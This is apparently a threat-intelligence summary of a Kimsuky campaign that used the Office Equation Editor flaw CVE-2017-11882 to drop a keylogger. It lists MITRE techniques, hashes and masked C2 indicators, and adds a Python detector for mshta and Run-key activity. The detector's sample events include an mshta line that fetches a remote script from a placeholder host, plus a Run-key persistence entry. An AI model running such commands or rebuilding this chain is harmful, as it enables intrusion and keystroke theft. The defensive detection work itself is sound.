Keylogger Exploits MS Office Equation Editor Vulnerability (Kimsuky)

Kimsuky’s operation exploited an Office Equation Editor flaw (CVE-2017-11882) to drop a keylogger via an mshta-driven page. The activity includes downloading additional malware, collecting system data, and persisting through a Run key; defenders are urged to patch the vulnerability and keep software updated. #Kimsuky #CVE-2017-11882 #MSOfficeEquationEditor #mshta #PowerShell #Keylogger

Keypoints

  • The Kimsuky threat group exploited CVE-2017-11882 in the MS Office equation editor (EQNEDT32.EXE) to run a page with an embedded malicious script via the mshta process.
  • The page the mshta connects to (error.php) is hosted on a compromised C2 site and can execute the malicious script even when the page shows a Not Found message.
  • The dropped payload chain includes downloading additional malware from the C2 (PowerShell-based) and registering persistence via desktop.ini.bak under the Run key.
  • A PowerShell-based first stage collects system and IP information and can download and execute a keylogger from the C2.
  • The keylogger saves data to desktop.ini.bak in the Users\Public\Music path, uses a mutex to prevent duplicate instances, and exfiltrates data to the C2 at random intervals.
  • The Run-key persistence is intended to survive reboots (the script edits the Run registry under HKLM with the name “Clear Web History”).
  • The article stresses patching the vulnerability, updating software, and deploying sandbox-based defenses to prevent similar infections in the future.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – The threat actor exploited a vulnerability in the MS Office equation editor to run a page with an embedded malicious script using mshta. “…exploiting the vulnerability to run a page with an embedded malicious script with the mshta process…”
  • [T1218.005] Mshta – mshta.exe executed via the equation editor program (EQNEDT32.exe). “mshta.exe executed via the equation editor program (EQNEDT32.exe)”
  • [T1105] Ingress Tool Transfer – The malware downloads additional components from the C2 (Query=50) via a PowerShell command. “downloaded an additional malware strain from the C2 (Query=50) via a PowerShell command”
  • [T1059.001] PowerShell – The PowerShell-based stage is used to download and execute further payloads. “via a PowerShell command”
  • [T1082] System Information Discovery – The first PowerShell stage collects system and IP information. “collects system and IP information”
  • [T1041] Exfiltration Over C2 Channel – Collected data is sent to the C2 at random times. “The collected data is sent at random times within the time range set by the threat actor to the C2”
  • [T1056.001] Keylogging – The keylogger collects keystrokes and clipboard data. “recording users’ keylogging data as well as clipboard data”
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence by registering desktop.ini.bak in the Run key under HKLM with the name “Clear Web History.” “registering the desktop.ini.bak file in the Run key under HKLM with the name ‘Clear Web History’”
  • [T1059.005] Windows Script – Mention of wscript being used; indicates Windows Script Host usage. “the part where wscript is run”
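Detection logic for two of the behaviours listed above (mshta.exe launched by the Equation Editor EQNEDT32.EXE, and a Run value named “Clear Web History” pointing at desktop.ini.bak under Users\Public\Music), written as an added example that is not part of the ASEC report. It runs over constructed Sysmon-style JSON-lines events; the field names, sample paths, the wscript launch line and the placeholder C2 host are assumptions, not artifacts from the report.

```python
"""Run two simple detectors over constructed process-creation and
registry-set events (Sysmon conventions: EventID 1 and EventID 13).
Added example; sample events and field names are assumptions."""
import json
import ntpath
import re

# Constructed sample telemetry as JSON lines; the C2 host is a placeholder.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1,
                "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r'"WINWORD.EXE" invoice.docx'}),
    json.dumps({"EventID": 1,  # constructed: Equation Editor started out-of-process
                "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                "ParentImage": r"C:\Windows\System32\svchost.exe",
                "CommandLine": r'"EQNEDT32.EXE" -Embedding'}),
    json.dumps({"EventID": 1,  # the chain described in the report
                "Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                "CommandLine": "mshta http://c2-placeholder.example/images/png/error.php"}),
    json.dumps({"EventID": 1,  # benign mshta use, must not alert
                "Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"mshta C:\Tools\helpdesk.hta"}),
    json.dumps({"EventID": 13,  # Run-key persistence; launch line is an assumption
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clear Web History",
                "Details": r"wscript.exe C:\Users\Public\Music\desktop.ini.bak"}),
    json.dumps({"EventID": 13,  # benign Run value, must not alert
                "Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
                "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
                "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"}),
]

# Value name is the last path component under ...\CurrentVersion\Run\
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\([^\\]+)$", re.IGNORECASE)
PUBLIC_MUSIC_RE = re.compile(r"(\\Users\\Public\\Music\\|%PUBLIC%\\Music\\)", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def detect_mshta_from_equation_editor(ev: dict):
    """T1203 / T1218.005: mshta.exe whose parent process is EQNEDT32.EXE.
    mshta launched from explorer.exe or a user shell does not match."""
    if ev.get("EventID") != 1:
        return None
    if _basename(ev.get("Image", "")) != "mshta.exe":
        return None
    if _basename(ev.get("ParentImage", "")) != "eqnedt32.exe":
        return None
    return {"technique": ["T1203", "T1218.005"],
            "reason": "mshta.exe spawned by EQNEDT32.EXE",
            "command_line": ev.get("CommandLine", "")}


def detect_run_key_persistence(ev: dict):
    """T1547.001: a Run value named 'Clear Web History', or any Run value
    that launches desktop.ini.bak from the Public\\Music folder."""
    if ev.get("EventID") != 13:
        return None
    m = RUN_KEY_RE.search(ev.get("TargetObject", ""))
    if not m:
        return None
    value_name = m.group(1)
    details = ev.get("Details", "")
    name_hit = value_name.lower() == "clear web history"
    file_hit = "desktop.ini.bak" in details.lower() and bool(PUBLIC_MUSIC_RE.search(details))
    if not (name_hit or file_hit):
        return None
    return {"technique": ["T1547.001"],
            "reason": f"Run value '{value_name}' -> {details}",
            "command_line": details}


DETECTORS = (detect_mshta_from_equation_editor, detect_run_key_persistence)


def scan(lines):
    """Parse JSON-lines telemetry and return one alert per matching event.
    Malformed lines are skipped instead of aborting the scan."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        for detector in DETECTORS:
            hit = detector(ev)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["technique"], "-", alert["reason"])
```

The parent/child check is the durable signal here: the masked C2 URL will change, but a legitimate Equation Editor has no reason to start mshta.exe. The Run-key detector matches on either the value name the report gives or the desktop.ini.bak path, so a renamed value still alerts when the file location is kept.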

Indicators of Compromise

  • [MD5] 279c86f3796d14d2a4d89049c2b3fa2d, 5bfeef520eb1e62ea2ef313bb979aeae, and d404ab9c8722fc97cceb95f258a2e70d
  • [File Name] EQNEDT32.EXE – MS Office equation editor component exploited
  • [File Name] desktop.ini.bak – used for keylogging persistence
  • [File Name] 50.php, 107.php – script files associated with the malicious payloads
  • [URL] http://xxxxxxxxxxx.xxxxxx.xxxxxxxx.com/images/png/error.php – page hosting the malicious script
  • [Domain] xxxxxxxxx.xxxxxx.xxxxxxxx.com – C2 domain hosting error.php

Read more: https://asec.ahnlab.com/en/66720/